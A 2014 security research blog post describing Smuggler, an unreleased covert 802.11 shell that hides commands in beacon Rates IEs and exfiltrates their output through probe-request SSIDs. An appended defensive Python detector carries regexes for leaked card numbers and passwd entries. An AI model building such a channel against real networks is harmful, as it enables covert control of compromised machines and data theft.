I just utilised an IE in a way not originally intended to pass a message. At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast "coupons" for advertising purposes. The paper did not, however, discuss using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes. So it seems that I am a little late to the party; however, it also appears that I am doing things a little differently – I am injecting into the actual IE. Furthermore, the existing research falls short in being restricted to a one-way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler.

I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this: An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens for management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command.
The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch. Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker's machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash.

So, to summarise:
Receiver (client.py): If a management beacon frame (AND blank SSID) is seen, read the rates (attackers_command) IE and send it to the OS to parse. Process attackers_command
Attacker sends commands (smuggler.py): Construct a management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command
Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand

As a proof of concept the same machine is being used with two wireless cards; however, this would work exactly the same on two computers. The example below shows the attacker issuing the "who" command wirelessly (in the "rates" IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request. What happens "under the hood" within the airwaves is shown below.

Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine: The attacker recreates these commands over the wireless airwaves, all without association or authentication.
I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and using it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such covert channels would be reinforced with several layers of security, encryption being just one of them. For the final treat: Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc.

[1] Chapter 4 - 802.11 Management frames - DotEleven
[2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox
[3] Chandra R., Padhye J., Ravindranath L., Wolman A. "Beacon-Stuffing: Wi-Fi without Associations", In Proceedings of the Eighth IEEE Workshop on Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007)
[4] Gupta G., Rohil M.K., "Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information", International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013)

Posted by Tom Neaves on 03 November 2014

Source: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs
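The detection side of this post, as an added example (not Smuggler or Anti-Smuggler code): a parser for the Information Element TLVs in 802.11 management frame bodies, with two checks that correspond to the two halves of the channel described above, a blank-SSID beacon whose Rates IE does not contain rate octets, and a probe-request SSID that looks like command output. It needs no scapy; the frame bodies, the rate table and the exfiltration regexes are constructed.

```python
"""Parse 802.11 management-frame Information Elements and flag the covert
channel described in the Smuggler post.  Added example; frame bodies and
patterns are constructed, not captures from the post."""
import re
import struct

BEACON, PROBE_REQ = 8, 4      # management frame subtypes (type 0)

# Rates IE octets are multiples of 500 kbit/s (1, 2, 5.5, 6, 9, 11, 12, 18,
# 24, 36, 48, 54 Mbit/s), optionally with the "basic rate" bit 0x80 set.
# Text such as "who" cannot be expressed with these values.
VALID_RATE_BYTES = {r | basic
                    for r in (2, 4, 11, 12, 18, 22, 24, 36, 48, 72, 96, 108)
                    for basic in (0, 0x80)}

# Constructed patterns for command output leaking in probe-request SSIDs.
EXFIL_PATTERNS = [
    ("credit-card-like", re.compile(r"\b(?:\d[ -]?){13,16}\b")),
    ("passwd-entry", re.compile(r"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:")),
    ("directory-listing", re.compile(r"^[-d][rwx-]{9}\s")),
]


def parse_ies(body):
    """Return [(element_id, value_bytes), ...]; stops at a truncated element."""
    ies, i = [], 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        if i + 2 + length > len(body):
            break                                  # malformed / truncated IE
        ies.append((eid, body[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def inspect_frame(subtype, body):
    """Return a list of findings for one management frame body."""
    findings = []
    if subtype == BEACON:
        ies = parse_ies(body[12:])     # skip timestamp(8), interval(2), capability(2)
    elif subtype == PROBE_REQ:
        ies = parse_ies(body)          # probe requests start with the IEs
    else:
        return findings
    ssid = next((v for eid, v in ies if eid == 0), b"")
    rates = next((v for eid, v in ies if eid == 1), b"")
    if subtype == BEACON and ssid == b"" and rates \
            and any(b not in VALID_RATE_BYTES for b in rates):
        findings.append(f"blank-SSID beacon with non-rate bytes in Rates IE: {rates!r}")
    if subtype == PROBE_REQ and ssid:
        text = ssid.decode("latin-1")
        for name, pattern in EXFIL_PATTERNS:
            if pattern.search(text):
                findings.append(f"probe-request SSID looks like {name}: {text!r}")
    return findings


def build_ies(*elements):
    """Assemble (id, value) pairs into TLV bytes for the constructed samples."""
    return b"".join(struct.pack("BB", eid, len(v)) + v for eid, v in elements)


# Constructed frame bodies: a normal beacon, a command-carrying beacon, and a
# probe request whose SSID carries a card-number-like string.
NORMAL_BEACON = bytes(12) + build_ies((0, b"HomeWiFi"),
                                       (1, bytes([0x82, 0x84, 0x8B, 0x96])),
                                       (3, b"\x06"))
COVERT_BEACON = bytes(12) + build_ies((0, b""), (1, b"who"), (3, b"\x03"))
LEAKING_PROBE = build_ies((0, b"4111 1111 1111 1111"), (1, bytes([0x82, 0x84])))

if __name__ == "__main__":
    for label, subtype, body in (("normal beacon", BEACON, NORMAL_BEACON),
                                 ("covert beacon", BEACON, COVERT_BEACON),
                                 ("leaking probe", PROBE_REQ, LEAKING_PROBE)):
        print(label, inspect_frame(subtype, body) or "ok")
```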